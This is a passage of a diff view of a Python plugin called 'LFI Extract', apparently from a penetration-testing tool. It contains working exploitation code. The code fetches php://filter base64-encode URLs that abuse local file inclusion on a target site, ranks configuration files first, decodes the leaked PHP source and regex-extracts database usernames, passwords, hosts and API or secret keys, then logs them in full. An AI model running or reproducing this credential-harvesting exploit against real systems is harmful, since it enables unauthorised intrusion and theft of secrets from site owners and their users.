# Filter to only PHP filter URLs
|
|
272
|
+
php_filter_urls = [
|
|
273
|
+
url
|
|
274
|
+
for url in urls_to_process
|
|
275
|
+
if "php://filter" in url and "base64-encode" in url
|
|
276
|
+
]
|
|
277
|
+
|
|
278
|
+
# Prioritize config files
|
|
279
|
+
prioritized = []
|
|
280
|
+
other = []
|
|
281
|
+
for url in php_filter_urls:
|
|
282
|
+
url_lower = url.lower()
|
|
283
|
+
if any(hv in url_lower for hv in HIGH_VALUE_FILES):
|
|
284
|
+
prioritized.append(url)
|
|
285
|
+
else:
|
|
286
|
+
other.append(url)
|
|
287
|
+
urls_to_process = (prioritized + other)[:max_urls]
|
|
288
|
+
|
|
289
|
+
try:
|
|
290
|
+
result = self._extract_credentials(urls_to_process, timeout)
|
|
291
|
+
output = self._format_output(target, result, label, urls_to_process)
|
|
292
|
+
|
|
293
|
+
if log_path:
|
|
294
|
+
with open(log_path, "w", encoding="utf-8", errors="replace") as fh:
|
|
295
|
+
fh.write(output)
|
|
296
|
+
# Write JSON result for parsing
|
|
297
|
+
fh.write("\n\n=== JSON_RESULT ===\n")
|
|
298
|
+
fh.write(json.dumps(result, indent=2))
|
|
299
|
+
fh.write("\n=== END_JSON_RESULT ===\n")
|
|
300
|
+
|
|
301
|
+
return 0 if result.get("credentials") else 1
|
|
302
|
+
|
|
303
|
+
except Exception as e:
|
|
304
|
+
error_output = f"=== Plugin: LFI Extract ===\n"
|
|
305
|
+
error_output += f"Target: {target}\n"
|
|
306
|
+
error_output += f"Error: {type(e).__name__}: {e}\n"
|
|
307
|
+
|
|
308
|
+
if log_path:
|
|
309
|
+
with open(log_path, "w", encoding="utf-8", errors="replace") as fh:
|
|
310
|
+
fh.write(error_output)
|
|
311
|
+
|
|
312
|
+
return 1
|
|
313
|
+
|
|
314
|
+
def _extract_credentials(
|
|
315
|
+
self, urls: List[str], timeout: int = 10
|
|
316
|
+
) -> Dict[str, Any]:
|
|
317
|
+
"""
|
|
318
|
+
Fetch PHP filter URLs and extract credentials from decoded content.
|
|
319
|
+
|
|
320
|
+
Returns:
|
|
321
|
+
Dict containing:
|
|
322
|
+
- credentials: List of extracted credential dicts
|
|
323
|
+
- sources_processed: Number of URLs successfully processed
|
|
324
|
+
- sources_failed: Number of URLs that failed
|
|
325
|
+
- decoded_files: List of files that were decoded
|
|
326
|
+
"""
|
|
327
|
+
import requests
|
|
328
|
+
|
|
329
|
+
result = {
|
|
330
|
+
"credentials": [],
|
|
331
|
+
"sources_processed": 0,
|
|
332
|
+
"sources_failed": 0,
|
|
333
|
+
"decoded_files": [],
|
|
334
|
+
"errors": [],
|
|
335
|
+
}
|
|
336
|
+
|
|
337
|
+
if not urls:
|
|
338
|
+
result["errors"].append("No PHP filter URLs provided")
|
|
339
|
+
return result
|
|
340
|
+
|
|
341
|
+
for url in urls:
|
|
342
|
+
try:
|
|
343
|
+
resp = requests.get(url, timeout=timeout, verify=False) # nosec B501
|
|
344
|
+
|
|
345
|
+
if resp.status_code != 200:
|
|
346
|
+
result["sources_failed"] += 1
|
|
347
|
+
result["errors"].append(f"HTTP {resp.status_code}: {url[:80]}")
|
|
348
|
+
continue
|
|
349
|
+
|
|
350
|
+
# Extract base64 from response
|
|
351
|
+
html = resp.text
|
|
352
|
+
base64_pattern = r"([A-Za-z0-9+/]{50,}={0,2})"
|
|
353
|
+
matches = re.findall(base64_pattern, html)
|
|
354
|
+
|
|
355
|
+
if not matches:
|
|
356
|
+
result["sources_failed"] += 1
|
|
357
|
+
result["errors"].append(f"No base64 found: {url[:80]}")
|
|
358
|
+
continue
|
|
359
|
+
|
|
360
|
+
for b64_match in matches:
|
|
361
|
+
try:
|
|
362
|
+
decoded = base64.b64decode(b64_match).decode(
|
|
363
|
+
"utf-8", errors="ignore"
|
|
364
|
+
)
|
|
365
|
+
|
|
366
|
+
# Skip if it doesn't look like code
|
|
367
|
+
if (
|
|
368
|
+
"<?php" not in decoded
|
|
369
|
+
and "$" not in decoded
|
|
370
|
+
and "=" not in decoded
|
|
371
|
+
):
|
|
372
|
+
continue
|
|
373
|
+
|
|
374
|
+
# Extract source file name from URL
|
|
375
|
+
source_file = self._extract_source_file(url)
|
|
376
|
+
result["decoded_files"].append(source_file)
|
|
377
|
+
result["sources_processed"] += 1
|
|
378
|
+
|
|
379
|
+
# Extract credentials
|
|
380
|
+
creds = self._parse_credentials(decoded, url, source_file)
|
|
381
|
+
if creds:
|
|
382
|
+
result["credentials"].extend(creds)
|
|
383
|
+
|
|
384
|
+
break # Found valid content, move to next URL
|
|
385
|
+
|
|
386
|
+
except Exception:
|
|
387
|
+
continue
|
|
388
|
+
|
|
389
|
+
except requests.RequestException as e:
|
|
390
|
+
result["sources_failed"] += 1
|
|
391
|
+
result["errors"].append(f"Request failed: {str(e)[:50]}")
|
|
392
|
+
except Exception as e:
|
|
393
|
+
result["sources_failed"] += 1
|
|
394
|
+
result["errors"].append(f"Error: {str(e)[:50]}")
|
|
395
|
+
|
|
396
|
+
return result
|
|
397
|
+
|
|
398
|
+
def _extract_source_file(self, url: str) -> str:
|
|
399
|
+
"""Extract the source file name from a PHP filter URL."""
|
|
400
|
+
# Look for resource= parameter
|
|
401
|
+
match = re.search(r"resource=([^&\s]+)", url)
|
|
402
|
+
if match:
|
|
403
|
+
resource = match.group(1)
|
|
404
|
+
# Clean up the resource path
|
|
405
|
+
if "/" in resource:
|
|
406
|
+
return resource.split("/")[-1]
|
|
407
|
+
return resource
|
|
408
|
+
return "unknown"
|
|
409
|
+
|
|
410
|
+
def _parse_credentials(
|
|
411
|
+
self, content: str, source_url: str, source_file: str
|
|
412
|
+
) -> List[Dict[str, Any]]:
|
|
413
|
+
"""Parse decoded content for credentials."""
|
|
414
|
+
credentials = []
|
|
415
|
+
found = {"username": None, "password": None, "database": None, "host": None}
|
|
416
|
+
|
|
417
|
+
for pattern, field in CREDENTIAL_PATTERNS:
|
|
418
|
+
if field == "connection_string":
|
|
419
|
+
# Handle connection strings specially
|
|
420
|
+
match = re.search(pattern, content, re.IGNORECASE)
|
|
421
|
+
if match:
|
|
422
|
+
groups = match.groups()
|
|
423
|
+
if len(groups) >= 4:
|
|
424
|
+
found["username"] = groups[0]
|
|
425
|
+
found["password"] = groups[1]
|
|
426
|
+
found["host"] = groups[2]
|
|
427
|
+
found["database"] = groups[3]
|
|
428
|
+
else:
|
|
429
|
+
match = re.search(pattern, content, re.IGNORECASE)
|
|
430
|
+
if match:
|
|
431
|
+
value = match.group(1)
|
|
432
|
+
# Don't overwrite with empty or placeholder values
|
|
433
|
+
if value and value not in (
|
|
434
|
+
"",
|
|
435
|
+
"root",
|
|
436
|
+
"localhost",
|
|
437
|
+
"127.0.0.1",
|
|
438
|
+
"password",
|
|
439
|
+
"changeme",
|
|
440
|
+
):
|
|
441
|
+
if not found.get(field):
|
|
442
|
+
found[field] = value
|
|
443
|
+
elif not found.get(field):
|
|
444
|
+
# Accept default values like 'root' if nothing else found
|
|
445
|
+
found[field] = value
|
|
446
|
+
|
|
447
|
+
# If we found at least username and password, create credential entry
|
|
448
|
+
if found.get("username") and found.get("password"):
|
|
449
|
+
credentials.append(
|
|
450
|
+
{
|
|
451
|
+
"username": found["username"],
|
|
452
|
+
"password": found["password"],
|
|
453
|
+
"database": found.get("database"),
|
|
454
|
+
"host": found.get("host", "localhost"),
|
|
455
|
+
"source_url": source_url,
|
|
456
|
+
"source_file": source_file,
|
|
457
|
+
"credential_type": "database",
|
|
458
|
+
}
|
|
459
|
+
)
|
|
460
|
+
|
|
461
|
+
# Also look for API keys as separate credentials
|
|
462
|
+
for pattern, field in CREDENTIAL_PATTERNS:
|
|
463
|
+
if field in ("api_key", "secret_key"):
|
|
464
|
+
for match in re.finditer(pattern, content, re.IGNORECASE):
|
|
465
|
+
key_value = match.group(1)
|
|
466
|
+
if len(key_value) >= 20: # API keys are usually long
|
|
467
|
+
credentials.append(
|
|
468
|
+
{
|
|
469
|
+
"api_key": key_value,
|
|
470
|
+
"source_url": source_url,
|
|
471
|
+
"source_file": source_file,
|
|
472
|
+
"credential_type": field,
|
|
473
|
+
}
|
|
474
|
+
)
|
|
475
|
+
|
|
476
|
+
return credentials
|
|
477
|
+
|
|
478
|
+
def _format_output(
|
|
479
|
+
self, target: str, result: Dict[str, Any], label: str, urls: List[str]
|
|
480
|
+
) -> str:
|
|
481
|
+
"""Format extraction results for log output."""
|
|
482
|
+
lines = []
|
|
483
|
+
lines.append("=" * 70)
|
|
484
|
+
lines.append("=== Plugin: LFI Extract (SoulEyez Built-in) ===")
|
|
485
|
+
lines.append("=" * 70)
|
|
486
|
+
lines.append(f"Target: {target}")
|
|
487
|
+
if label:
|
|
488
|
+
lines.append(f"Label: {label}")
|
|
489
|
+
lines.append(
|
|
490
|
+
f"Started: {time.strftime('%Y-%m-%d %H:%M:%S UTC', time.gmtime())}"
|
|
491
|
+
)
|
|
492
|
+
lines.append("")
|
|
493
|
+
lines.append(f"URLs processed: {result['sources_processed']}")
|
|
494
|
+
lines.append(f"URLs failed: {result['sources_failed']}")
|
|
495
|
+
lines.append(f"Files decoded: {', '.join(result['decoded_files']) or 'None'}")
|
|
496
|
+
lines.append("")
|
|
497
|
+
|
|
498
|
+
if result.get("credentials"):
|
|
499
|
+
lines.append("=" * 70)
|
|
500
|
+
lines.append("CREDENTIALS EXTRACTED")
|
|
501
|
+
lines.append("=" * 70)
|
|
502
|
+
lines.append("")
|
|
503
|
+
|
|
504
|
+
for i, cred in enumerate(result["credentials"], 1):
|
|
505
|
+
if cred.get("credential_type") == "database":
|
|
506
|
+
lines.append(f"[{i}] DATABASE CREDENTIALS")
|
|
507
|
+
lines.append(f" Username: {cred.get('username')}")
|
|
508
|
+
lines.append(f" Password: {cred.get('password')}")
|
|
509
|
+
lines.append(f" Database: {cred.get('database', 'unknown')}")
|
|
510
|
+
lines.append(f" Host: {cred.get('host', 'localhost')}")
|
|
511
|
+
lines.append(f" Source: {cred.get('source_file')}")
|
|
512
|
+
elif cred.get("credential_type") in ("api_key", "secret_key"):
|
|
513
|
+
lines.append(
|
|
514
|
+
f"[{i}] {cred.get('credential_type', 'API KEY').upper()}"
|
|
515
|
+
)
|
|
516
|
+
key = cred.get("api_key", "")
|
|
517
|
+
lines.append(
|
|
518
|
+
f" Key: {key[:20]}...{key[-10:] if len(key) > 30 else key}"
|
|
519
|
+
)
|
|
520
|
+
lines.append(f" Source: {cred.get('source_file')}")
|
|
521
|
+
lines.append("")
|
|
522
|
+
|
|
523
|
+
else:
|
|
524
|
+
lines.append("No credentials found in decoded files.")
|
|
525
|
+
lines.append("")
|
|
526
|
+
|
|
527
|
+
if result.get("errors"):
|
|
528
|
+
lines.append("-" * 40)
|
|
529
|
+
lines.append("Errors encountered:")
|
|
530
|
+
for err in result["errors"][:10]:
|
|
531
|
+
lines.append(f" - {err}")
|
|
532
|
+
lines.append("")
|
|
533
|
+
|
|
534
|
+
lines.append(
|
|
535
|
+
f"\n=== Completed: {time.strftime('%Y-%m-%d %H:%M:%S UTC', time.gmtime())} ==="
|
|
536
|
+
)
|
|
537
|
+
|
|
538
|
+
return "\n".join(lines)
|
|
539
|
+
|
|
540
|
+
|
|
541
|
+
plugin = LfiExtractPlugin()
|